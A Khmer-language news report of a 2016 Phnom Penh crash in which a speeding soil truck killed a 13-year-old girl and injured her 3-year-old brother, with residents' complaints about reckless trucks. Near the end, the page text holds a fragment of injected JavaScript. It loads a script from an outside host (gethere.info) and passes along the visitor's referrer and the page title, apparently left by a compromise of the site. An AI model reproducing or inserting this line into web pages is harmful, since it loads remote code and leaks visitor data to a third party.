រថយន្តយីឌុបដឹកដីបើកលឿនដូចហោះបុកម៉ូតូបណ្ដាលអោយក្មេងស្រីម្នាក់ស្លាប់នឹងក្មេងប្រុសម្នាក់រងរបួសជើងខាងស្ដាំ

ភ្នំពេញ៖ រថយន្តយីឌុបដឹកដីបើកលឿនដូចហោះបុកម៉ូតូបណ្ដាលអោយក្មេងម្នាក់ស្លាប់នឹងក្មេងប្រុសម្នាក់រងរបួស។ហេតុការណ៍នេះកើតឡើងកាលពីវេលាម៉ោង១១នឹង៣០នាទីថ្ងៃទី៦ ខែសីហា ឆ្នាំ២០១៦ តាមកំណាត់ផ្លូ២១៧ ស្ថិតនៅភូមិថ្មីសង្កាត់ដង្កោ ខណ្ឌដង្កោ ។

បើតាមការរៀបរាប់ពីម្ដាយក្មេងស្រីរងគ្រោះបានអោយដឹងថា កូនស្រីរបស់គាត់ដែលត្រូរថយន្ដដឹកដីបុកអោយស្លាប់មានឈ្មោះ ហេន ម៉ារីយ៉ា អាយុ ១៣ ឆ្នាំ ជាសិស្សរៀននៅអនុវិទ្យាល័យដង្កោ ថ្នាក់ទី ៧ នឹងកូនប្រុសម្នាក់ទៀតរងរបួសជើងខាងស្ដាំដែលមានឈ្មោះ ហេន សិរិសូនី អាយុ ៣ ឆ្នាំ អ្នកទាំង ២ មានទីលំនៅនៅភូមិម័ល សង្កាត់ដង្កោ ខណ្ឌដង្កោ។

បើតាមប្រភពពត៌មានពីកន្លែងកើតហេតុបានអោយដឹងថាគេឃើញជនរងគ្រោះទាំង ២ នាក់បានជិះម៉ូតូម៉ាកលេត ពណ៌ទឹកប្រាក់ ពាក់ស្លាកលេខ ភ្នំពេញៈ 1FJ-0135 ដោយបើបរក្នុងទិសដៅពីជើង ទៅត្បូងលុះមកដល់ចំណុចកើតហេតុស្រាប់តែត្រូវបានរថយន្ដដឹកដីម៉ាក ដុងហ្វេង (DONGFENG) ពណ៌ស ពាក់ស្លាកលេខភ្នំពេញ 3C-7835 ដែលបើកបរដោយឈ្មោះ អៀមសារ៉ាន់ ភេទប្រុស អាយុ៣២ឆ្នាំ មុខរបរជាអ្នកបើរថយន្ដដឹកដី ដែលស្នាក់នៅ ភូមិទ្រា ៣ សង្កាត់ស្ទឹងមាជ័យ ខណ្ឌមានជ័យ ហើយមានស្រុកកំណើតនៅភូមិ ចន្ថាខ ឃុំស្ពឺខ ស្រុកបាភ្នំ ខេត្តព្រៃវែង បានបើករថយន្ដបុកពីក្រោយ ហើយខ្ទាតក្មេងស្រីចូលក្រោមកង់រថយន្ដកិនស្លាប់នៅនឹងកន្លែងតែម្ដង ចំណែកក្មេងប្រុសត្រូបានអ្នកជិតខាងជួយអូសចេញពីរថយន្ដទាន់ពេលហើយបានបញ្ជូនទៅសង្គ្រោះនៅមន្ទីពេទ្យ។ ចំណែកតៃកុងរថយន្ដត្រូវបានឃាត់ខ្លួនសួរនាំ នៅអធិការរដ្ឋាននគរបាលខណ្ឌដង្កោ។ ក្រោពេលកើតហេតុសមត្ថកិច្ចបានចុះវាស់វែងហើយយករថយន្ដនឹងម៉ូតូ ព្រមទាំងតៃកុងរថយន្ដទៅចរាចរណ៍ផ្លូវគោក ក្រុងភ្នំពេញដើម្បីដោះស្រាយតាមនិតិវិច្បាប់។
តាមសម្ដីរបស់ប្រជាពលរដ្ឋបានអោយដឹងថានៅតាមបណ្ដោយផ្លូវ ២១៧ រថយន្ដដឹកដីបើកលឿនៗ មិនគោរពអ្នកធ្វើដំណើរតាមដងផ្លូវ ហើយជារឿយៗរថយន្ដទាំងនោះតែងបង្ករគ្រោះថ្នាក់ដល់អាយុជីវិតជាញឹកញាប់ ហើយចំពោះអាជ្ញាធរហាក់មិនអើពើទៅលើបញ្ហានេះឡើយតែងតែប្រងើយកន្ដើយ ជារឿយៗប្រជាពលរដ្ឋតែងតែស្នើរសុំអោយអាជ្ញារធរមេត្តាជួយណែនាំដល់ក្រុមរថយន្ដដឹកដីទាំងនោះផង។ តែហាក់បីដូចជាបានតែមួយចំអិនកំពឹសតែប៉ុណ្ណោះ។ ដោយ៖ ចន្ធូ

image image image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More